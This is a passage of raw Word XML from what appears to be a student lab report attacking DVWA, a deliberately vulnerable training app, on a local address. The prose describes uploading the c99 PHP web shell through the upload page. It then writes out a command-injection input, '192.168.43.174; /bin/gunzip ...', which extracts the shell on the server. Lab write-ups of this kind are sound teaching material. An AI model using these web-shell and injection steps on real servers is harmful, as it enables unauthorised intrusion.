          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EF6AC54" wp14:editId="54B71A46">
            <wp:extent cx="5942965" cy="3130531"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="19"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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId21">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5217" r="16766" b="16837"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5970376" cy="3144970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F871F9D" w14:textId="2ACE208A" w:rsidR="00A4007D" w:rsidRDefault="006749E6" w:rsidP="006749E6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Clicked on </w:t>
      </w:r>
      <w:r w:rsidRPr="006749E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Browse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> under</w:t>
      </w:r>
      <w:r w:rsidRPr="006749E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500DECFD" w14:textId="78C9B2E6" w:rsidR="00261AC4" w:rsidRPr="00261AC4" w:rsidRDefault="006E5D62" w:rsidP="00261AC4">
      <w:r>
        <w:t xml:space="preserve">We then </w:t>
      </w:r>
      <w:r w:rsidR="004341A2">
        <w:t xml:space="preserve">navigated to </w:t>
      </w:r>
      <w:r w:rsidR="004341A2" w:rsidRPr="00C33DA3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/root/backdoor</w:t>
      </w:r>
      <w:r w:rsidR="004341A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C33DA3">
        <w:t>and selected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c99.php.gz</w:t>
      </w:r>
      <w:r w:rsidR="00C33DA3">
        <w:t>, then</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hit </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D62">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidR="00192612">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00192612">
        <w:t xml:space="preserve">and clicked on </w:t>
      </w:r>
      <w:r w:rsidR="00192612" w:rsidRPr="00192612">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Upload</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF62509" w14:textId="77777777" w:rsidR="00261AC4" w:rsidRDefault="006749E6" w:rsidP="00261AC4">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20A8D0FE" wp14:editId="7B7A5DE8">
            <wp:extent cx="5943600" cy="3319325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5"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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId22">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="717"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3319325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F79666" w14:textId="2C7CAC97" w:rsidR="00261AC4" w:rsidRDefault="00261AC4" w:rsidP="00261AC4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Selecting </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c99.php.gz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8FBD4B" w14:textId="6F342362" w:rsidR="00AD1E55" w:rsidRDefault="00291F0D" w:rsidP="007732A8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We were then successfully able to view the message and the path where </w:t>
      </w:r>
      <w:r w:rsidRPr="00291F0D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c99.php.gz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was uploaded </w:t>
      </w:r>
      <w:r w:rsidR="00EF7523">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004341A2" w:rsidRPr="004341A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>../../hackable/uploads/</w:t>
      </w:r>
      <w:r w:rsidR="00C33DA3" w:rsidRPr="00C33DA3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F4B0E" w14:textId="6CE11D7C" w:rsidR="007732A8" w:rsidRPr="007732A8" w:rsidRDefault="00192612" w:rsidP="00AD1E55">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251709440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="133508AC" wp14:editId="021D6678">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>2381250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2019300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2514600" cy="123825"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="462" name="Flowchart: Alternate Process 462"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2514600" cy="123825"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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5DA1F" id="Flowchart: Alternate Process 462" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:187.5pt;margin-top:159pt;width:198pt;height:9.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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007732A8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AE396DF" wp14:editId="4822C49C">
            <wp:extent cx="5944549" cy="3130756"/>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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId23">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5202" r="16843" b="16940"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5990451" cy="3154931"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A21329A" w14:textId="31F688BF" w:rsidR="006E5D62" w:rsidRPr="006E5D62" w:rsidRDefault="00AD1E55" w:rsidP="00AD1E55">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - View the message that says </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1E55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c99.php.gz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was successfully uploaded to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1E55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>../../hackable/uploads/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404A4745" w14:textId="77777777" w:rsidR="002D1981" w:rsidRDefault="002D1981" w:rsidP="008E299B"/>
    <w:p w14:paraId="3DDE70F0" w14:textId="436229BB" w:rsidR="002A70C2" w:rsidRPr="007732A8" w:rsidRDefault="002A70C2" w:rsidP="007732A8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc41839633"/>
      <w:r>
        <w:t>Navigating to ../..</w:t>
      </w:r>
      <w:r w:rsidRPr="002A70C2">
        <w:t>/hackable/uploads/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="16142FB8" w14:textId="1ABCA690" w:rsidR="00E00F07" w:rsidRPr="00495F31" w:rsidRDefault="00E00F07" w:rsidP="00E00F07">
      <w:r>
        <w:t xml:space="preserve">We navigated </w:t>
      </w:r>
      <w:bookmarkStart w:id="12" w:name="_Hlk41266858"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3704">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE3704" w:rsidRPr="00CE3704">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>../../hackable/uploads/</w:t>
      </w:r>
      <w:r w:rsidR="00CE3704">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE3704">
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidR="00990981">
        <w:t xml:space="preserve">going </w:t>
      </w:r>
      <w:r w:rsidR="00495F31">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00990981">
        <w:t xml:space="preserve">the following link </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="00077ABE" w:rsidRPr="004C263E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>http://192.168.43.174/dvwa/hackable/uploads/</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidR="00077ABE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE5F7D">
        <w:t xml:space="preserve">but soon we realised that we were not able to run a </w:t>
      </w:r>
      <w:r w:rsidR="002E563C">
        <w:t xml:space="preserve">PHP file that has been compressed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBEEDB1" w14:textId="017111C1" w:rsidR="004D4404" w:rsidRDefault="00192612" w:rsidP="008B38A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251715584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14D60950" wp14:editId="0C32F641">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1388110</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="638175" cy="133350"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="471" name="Flowchart: Alternate Process 471"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="638175" cy="133350"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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AD0E8" id="Flowchart: Alternate Process 471" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:0;margin-top:109.3pt;width:50.25pt;height:10.5pt;z-index:251715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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251711488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C249B1B" wp14:editId="6C464260">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>990600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>445135</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1543050" cy="123825"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="463" name="Flowchart: Alternate Process 463"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1543050" cy="123825"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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0B488" id="Flowchart: Alternate Process 463" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:78pt;margin-top:35.05pt;width:121.5pt;height:9.7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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002A70C2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B4A8666" wp14:editId="6DB38D40">
            <wp:extent cx="5943600" cy="1841500"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId25">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="44919"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1841500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D4E6D3" w14:textId="099BB4ED" w:rsidR="00A46319" w:rsidRDefault="004D4404" w:rsidP="00BD070F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Trying to run a PHP file that has been compressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56760F1B" w14:textId="498449D8" w:rsidR="008E299B" w:rsidRDefault="0074572F" w:rsidP="0074572F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So, we went back to </w:t>
      </w:r>
      <w:r w:rsidR="00D606C0">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">web server and </w:t>
      </w:r>
      <w:r w:rsidR="00E66A53">
        <w:t xml:space="preserve">under </w:t>
      </w:r>
      <w:r w:rsidR="00E66A53" w:rsidRPr="00E66A53">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Command Execution</w:t>
      </w:r>
      <w:r w:rsidR="00E66A53">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E66A53">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">and entered </w:t>
      </w:r>
      <w:r w:rsidR="002D64DA" w:rsidRPr="002D64DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>192.168.43.174; /bin/gunzip -v ../../hackable/uploads/c99.php</w:t>
      </w:r>
      <w:r w:rsidR="002D64DA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> and hit submit</w:t>
      </w:r>
      <w:r w:rsidR="00D96A54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the following result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1731664E" w14:textId="75DB0442" w:rsidR="002625F5" w:rsidRDefault="00192612" w:rsidP="002625F5">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251713536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E3F5687" wp14:editId="2CBDBCEB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1685925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1726565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2428875" cy="666750"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="464" name="Flowchart: Alternate Process 464"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2428875" cy="666750"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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9EB92" id="Flowchart: Alternate Process 464" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:132.75pt;margin-top:135.95pt;width:191.25pt;height:52.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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0074572F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37BD58DE" wp14:editId="59C76EAD">
            <wp:extent cx="5943439" cy="2602955"/>
            <wp:effectExtent l="0" t="0" r="635" b="6985"/>
            <wp:docPr id="8"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3.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId26">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5202" b="16940"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2603026"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532A74C" w14:textId="32034529" w:rsidR="0074572F" w:rsidRDefault="002625F5" w:rsidP="002625F5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Performed Command Execution and extracted </w:t>
      </w:r>
      <w:r w:rsidRPr="002625F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c99.php.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F0305" w14:textId="6648F15D" w:rsidR="00957DD2" w:rsidRPr="00957DD2" w:rsidRDefault="005D6E63" w:rsidP="00957DD2">
      <w:r>
        <w:t>Further, we again navigated to</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3704">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ../../hackable/uploads/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by going to the following link </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="004C263E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
